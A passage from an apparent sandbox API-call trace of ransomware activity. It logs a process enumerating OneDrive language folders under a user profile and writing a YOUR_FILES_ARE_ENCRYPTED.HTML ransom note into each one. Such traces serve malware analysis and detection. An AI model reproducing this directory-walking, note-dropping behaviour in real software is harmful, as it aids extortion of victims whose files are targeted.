lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ko") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ko" [0161.847] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ko", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ko\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ko\\*" [0161.848] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ko\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4e09b70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4f86930, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4f86930, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.849] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4e09b70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4f86930, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4f86930, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.849] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4f86930, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4f86930, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa501eeb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xd8b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.849] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ko\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.849] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.849] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.849] lstrlenW (lpString=".mui") returned 4 [0161.849] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.849] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4f86930, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4f86930, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa501eeb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xd8b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.849] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.849] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ko\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.849] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ko\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ko\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.850] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.852] CloseHandle (hObject=0x5b8) returned 1 [0161.853] GetProcessHeap () returned 0x270000 [0161.853] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.853] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa501eeb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa51e7f30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa51e7f30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="kok", cAlternateFileName="")) returned 1 [0161.853] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kok") returned 75 [0161.854] GetProcessHeap () returned 0x270000 [0161.854] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.854] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kok" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kok") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kok" [0161.854] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kok", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kok\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kok\\*" [0161.854] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kok\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa501eeb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa51e7f30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa51e7f30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.854] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa501eeb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa51e7f30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa51e7f30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.854] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa51e7f30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa51e7f30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa51e7f30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.854] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kok\\FileSync.LocalizedResources.dll.mui") returned 111 [0161.854] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.854] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.854] lstrlenW (lpString=".mui") returned 4 [0161.854] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.854] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa51e7f30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa51e7f30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa51e7f30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.854] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.855] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kok\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0161.855] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kok\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\kok\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.855] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.858] CloseHandle (hObject=0x5b8) returned 1 [0161.858] GetProcessHeap () returned 0x270000 [0161.859] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.859] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa51e7f30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5449530, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5449530, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ku-arab", cAlternateFileName="")) returned 1 [0161.859] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ku-arab") returned 79 [0161.859] GetProcessHeap () returned 0x270000 [0161.859] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.859] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ku-arab" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ku-arab") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ku-arab" [0161.859] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ku-arab", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ku-arab\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ku-arab\\*" [0161.859] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ku-arab\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa51e7f30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5449530, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5449530, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.861] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa51e7f30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5449530, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5449530, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.861] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5449530, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5449530, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5449530, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12cb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.861] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ku-arab\\FileSync.LocalizedResources.dll.mui") returned 115 [0161.861] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.862] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.862] lstrlenW (lpString=".mui") returned 4 [0161.862] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.862] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5449530, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5449530, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5449530, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12cb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.862] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.862] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ku-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0161.862] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ku-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ku-arab\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.863] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.865] CloseHandle (hObject=0x5b8) returned 1 [0161.866] GetProcessHeap () returned 0x270000 [0161.866] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.866] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa5449530, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5638710, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5638710, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ky", cAlternateFileName="")) returned 1 [0161.866] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ky") returned 74 [0161.866] GetProcessHeap () returned 0x270000 [0161.866] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.866] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ky" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ky") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ky" [0161.867] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ky", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ky\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ky\\*" [0161.867] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ky\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa5449530, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5638710, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5638710, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.867] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa5449530, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5638710, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5638710, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.867] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5638710, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5638710, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5638710, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.867] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ky\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.867] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.867] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.867] lstrlenW (lpString=".mui") returned 4 [0161.867] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.867] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5638710, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5638710, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5638710, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.868] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.868] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ky\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.868] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ky\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ky\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.868] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.870] CloseHandle (hObject=0x5b8) returned 1 [0161.871] GetProcessHeap () returned 0x270000 [0161.871] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.872] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa5638710, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa58278f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa58278f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="lb-lu", cAlternateFileName="")) returned 1 [0161.872] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lb-lu") returned 77 [0161.872] GetProcessHeap () returned 0x270000 [0161.872] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.872] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lb-lu" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lb-lu") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lb-lu" [0161.872] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lb-lu", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lb-lu\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lb-lu\\*" [0161.872] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lb-lu\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa5638710, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa58278f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa58278f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.872] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa5638710, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa58278f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa58278f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.872] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa58278f0, 